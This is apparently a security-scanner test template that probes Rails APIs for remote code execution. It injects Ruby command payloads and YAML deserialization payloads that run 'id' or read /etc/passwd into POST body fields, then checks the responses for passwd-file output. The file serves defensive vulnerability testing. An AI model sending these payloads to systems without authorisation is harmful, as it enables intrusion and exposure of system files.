---
id: FRAMEWORK_RCE_RAILS
info:
  name: "Framework RCE - Rails"
  description: "Tests whether Rails applications are vulnerable to Remote Code Execution through body parameter injection and YAML deserialization. Enabled for all Rails applications."
  details: "This test injects Ruby code execution payloads and YAML deserialization payloads into body parameters to check if the application executes them, indicating a Remote Code Execution vulnerability. Configured for all Rails applications."
  impact: "Remote Code Execution vulnerabilities allow attackers to execute arbitrary code on the server, potentially leading to complete system compromise, unauthorized access to sensitive data, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: FRAMEWORK_RCE_RAILS
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Command_Injection"
  cwe:
    - CWE-78
    - CWE-77
    - CWE-94
  cve:
    - CVE-2013-7285

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  method:
    neq: "OPTIONS"
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0
  or:
    - request_payload:
        for_one:
          key:
            regex: .*
            extractMultiple: bodyKeys

wordLists:
  # Ruby/Rails RCE payloads
  rubyPayloads:
    - "system('id')"
    - "exec('id')"
    - "system('cat /etc/passwd')"
    - "exec('cat /etc/passwd')"
    - "IO.popen('id')"
    - "IO.popen('cat /etc/passwd')"
    - '`id`'
    - '`cat /etc/passwd`'
    - "eval(%q[system(`id`)])"
    - "eval(%q[exec(`cat /etc/passwd`)])"
    - "Kernel.exec('id')"
    - "Kernel.system('cat /etc/passwd')"
    - "Process.spawn('id')"
    - "Process.spawn('cat /etc/passwd')"
    - "open('|id')"
    - "open('|cat /etc/passwd')"
  
  # YAML deserialization payloads
  yamlPayloads:
    - "--- !ruby/object:OpenStruct\n  table:\n    :command: id"
    - "--- !ruby/object:OpenStruct\n  table:\n    :command: 'cat /etc/passwd'"
    - "--- !ruby/hash:OpenStruct\n  command: id"
    - "--- !ruby/hash:OpenStruct\n  command: 'cat /etc/passwd'"
    - "---\n- !ruby/object:OpenStruct\n  table:\n    :command: id"
    - "---\n- !ruby/object:OpenStruct\n  table:\n    :command: 'cat /etc/passwd'"
    - "--- !ruby/object:Gem::SpecFetcher\n  uri: !ruby/object:URI::HTTP\n    host: example.com\n    port: 80\n    path: /\n  fetcher: !ruby/object:Net::HTTP\n    address: example.com\n    port: 80"
    - "--- !ruby/object:Psych::Scalar\n  value: !ruby/object:OpenStruct\n    table:\n      :command: id"
    - "--- !ruby/object:Psych::Scalar\n  value: !ruby/object:OpenStruct\n    table:\n      :command: 'cat /etc/passwd'"
  
  # Command execution outcomes
  rceOutcomes:
    - "root:*:0:0:"
    - "root:.*:0:0:"
    - "uid=0"
    - "gid=0"
    - "Linux"
    - "Unix"
    - "GNU/Linux"
    - "bin/bash"
    - "bin/sh"
    - "/etc/passwd"
    - "daemon:"
    - "nobody:"
    - "www-data:"

execute:
  type: single
  requests:
    - req:
        - modify_method: POST
        - for_each_combination: true
        - modify_body_param:
            ${bodyKeys}: "${rubyPayloads}"
        - modify_body_param:
            ${bodyKeys}: "${yamlPayloads}"

validate:
  response_code:
    eq: 200
  response_payload:
    regex: 'root:.*:0:0:'
    contains_either: "${rceOutcomes}"
